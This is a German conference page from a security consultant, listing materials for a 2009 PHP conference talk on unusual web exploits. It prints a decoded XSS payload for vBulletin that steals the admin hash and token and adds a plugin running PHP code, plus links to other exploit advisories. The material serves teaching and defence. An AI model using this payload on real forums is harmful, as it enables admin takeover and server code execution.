Konferenzen

Dipl.-Inform. Carsten Eilers

Hier finden Sie die Präsentationen und weiterführende Informationen zu Vorträgen, die ich auf Konferenzen gehalten habe.


IPC2009SE

International PHP Conference 2009, Spring Edition

Vom 25. bis 27. Mai fand in Berlin die International PHP Conference 2009, Spring Edition, statt. Ich habe einen Vortag über eher unübliche Angriffe auf Webanwendungen gehalten: '"XSS-Schwachstelle kompromittiert Server" - Ungewöhnliche Exploits näher betrachtet'.

Beschreibung:
Manchmal haben Schwachstellen Auswirkungen, mit denen zumindest auf den ersten Blick kaum jemand gerechnet hätte. Gerade das macht sie so gefährlich, wenn ein Black Hat sie als erster findet. In dieser Session werden einige ungewöhnliche Exploits vorgestellt, ihre Funktionsweise analysiert und mögliche Gegenmaßnahmen beschrieben. Wären Ihre Anwendungen vor solchen Angriffen sicher?

Dateien zum Vortrag

Die verwendeten Advisories bzw. Exploits

  1. vBulletin
    Bugtraq: Exploit for vBulletin "obscure" XSS (3.7.1 & 3.6.10)
    JavaScript-Code dekodiert
    <script>
      eval("
        u='application/x-www-form-urlencoded';
        c='Content-type';
        d='Content-length';
        reg=new XMLHttpRequest();
        reg.open('GET', 'http://localhost/vB/upload/admincp/plugin.php?do=add', false);
        reg.send(null);
        r=reg.responseText;
        t='http://localhost/vB/upload/admincp/plugin.php';
        h='&adminhash='+r.substr(r.indexOf('hash\"')+13,32);
        to='&securitytoken='+r.substr(r.indexOf('token\"')+14,40);
        t2='product=vbulletin&hookname=forumhome_start&do=update&
    title=foo&executionorder=1&phpcode=phpinfo();&active=1'+h+to;
        r2=new XMLHttpRequest();
        r2.open('POST', t, false);
        r2.setRequestHeader(d,t2.length);
        r2.setRequestHeader(c,u);
        r2.send(t2);
        t='http://localhost/vB/upload/admincp/options.php';
        t2='do=dooptions&setting[enablehooks]=1'+h+to;
        r2=new XMLHttpRequest();
        r2.open('POST', t, false);
        r2.setRequestHeader(d,t2.length);
        r2.setRequestHeader(c,u);
        r2.send(t2);
        ")
    </script>
  2. cPanel
    cPanel Root XSS
    More Fun With cPanel
  3. RSMonials
    milw0rm.com: Joomla Component rsmonials Remote Cross Site Scxripting Exploit
  4. Simple Machines Forum (SMF)
    milw0rm.com: Simple Machines Forum (SMF) 1.1.6 Code Execution Exploit
  5. EZ-Blog
    milw0rm.com: EZ-Blog Beta2 (category) Remote SQL Injection Vulnerability
  6. AdaptBB
    milw0rm.com: AdaptBB 1.0b Multiple Remote Vulnerabilities
  7. TinyPHPForum
    milw0rm.com: TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities
  8. ASP
    F-Secure: Mass SQL Injection
    Handler's Diary des ISC: The 10.000 web sites infection mystery solved
    Handler's Diary des ISC: MSIE 0-day Spreading Via SQL Injection
  9. Massenangriff
    Handler's Diary des ISC: Mass website hosting = mass defacements